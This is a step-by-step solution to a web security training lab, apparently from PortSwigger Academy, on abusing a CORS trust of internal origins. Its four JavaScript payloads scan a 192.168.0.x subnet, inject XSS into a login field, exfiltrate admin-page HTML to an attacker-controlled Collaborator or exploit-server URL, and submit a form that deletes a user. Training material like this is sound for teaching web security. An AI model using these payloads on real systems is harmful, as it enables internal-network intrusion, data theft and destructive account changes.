Lab: CORS vulnerability with internal network pivot attack

This website has an insecure CORS configuration in that it trusts all internal network origins.

This lab requires multiple steps to complete. To solve the lab, craft some JavaScript to locate an endpoint on the local network (, port 8080) that you can then use to identify and create a CORS-based attack to delete a user. The lab is solved when you delete user carlos.


To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server.


Step 1

First we need to scan the local network for the endpoint. Replace $collaboratorPayload with your own Collaborator payload or exploit server URL. Enter the following code into the exploit server. Click store then "Deliver exploit to victim". Inspect the log or the Collaborator interaction and look at the code parameter sent to it.

<script> var q = [], collaboratorURL = 'http://$collaboratorPayload'; for(i=1;i<=255;i++) { q.push(function(url) { return function(wait) { fetchUrl(url, wait); } }('http://192.168.0.'+i+':8080')); } for(i=1;i<=20;i++){ if(q.length)q.shift()(i*100); } function fetchUrl(url, wait) { var controller = new AbortController(), signal = controller.signal; fetch(url, {signal}).then(r => r.text().then(text => { location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'; })) .catch(e => { if(q.length) { q.shift()(wait); } }); setTimeout(x => { controller.abort(); if(q.length) { q.shift()(wait); } }, wait); } </script>

Step 2

Clear the code from stage 1 and enter the following code in the exploit server. Replace $ip with the IP address and port number retrieved from your collaborator interaction. Don't forget to add your Collaborator payload or exploit server URL again. Update and deliver your exploit. We will now probe the username field for an XSS vulnerability. You should retrieve a Collaborator interaction with foundXSS=1 in the URL or you will see foundXSS=1 in the log.

<script> function xss(url, text, vector) { location = url + '/login?time=''&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1]; } function fetchUrl(url, collaboratorURL){ fetch(url).then(r => r.text().then(text => { xss(url, text, '"><img src='+collaboratorURL+'?foundXSS=1>'); })) } fetchUrl("http://$ip", "http://$collaboratorPayload"); </script>

Step 3

Clear the code from stage 2 and enter the following code in the exploit server. Replace $ip with the same IP address and port number as in step 2 and don't forget to add your Collaborator payload or exploit server again. Update and deliver your exploit. Your Collaborator interaction or your exploit server log should now give you the source code of the admin page.

<script> function xss(url, text, vector) { location = url + '/login?time=''&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1]; } function fetchUrl(url, collaboratorURL){ fetch(url).then(r=>r.text().then(text=> { xss(url, text, '"><iframe src=/admin onload="new Image().src=\''+collaboratorURL+'?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">'); } )) } fetchUrl("http://$ip", "http://$collaboratorPayload"); </script>

Step 4

Read the source code retrieved from step 3 in your Collaborator interaction or on the exploit server log. You'll notice there's a form that allows you to delete a user. Clear the code from stage 3 and enter the following code in the exploit server. Replace $ip with the same IP address and port number as in steps 2 and 3. The code submits the form to delete carlos by injecting an iframe pointing to the /admin page.

<script> function xss(url, text, vector) { location = url + '/login?time=''&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1]; } function fetchUrl(url){ fetch(url).then(r=>r.text().then(text=> { xss(url, text, '"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">'); } )) } fetchUrl("http://$ip"); </script>

Click on "Deliver exploit to victim" to submit the code. Once you have submitted the form to delete carlos then you have completed the lab.

Community solutions

Rana Khalil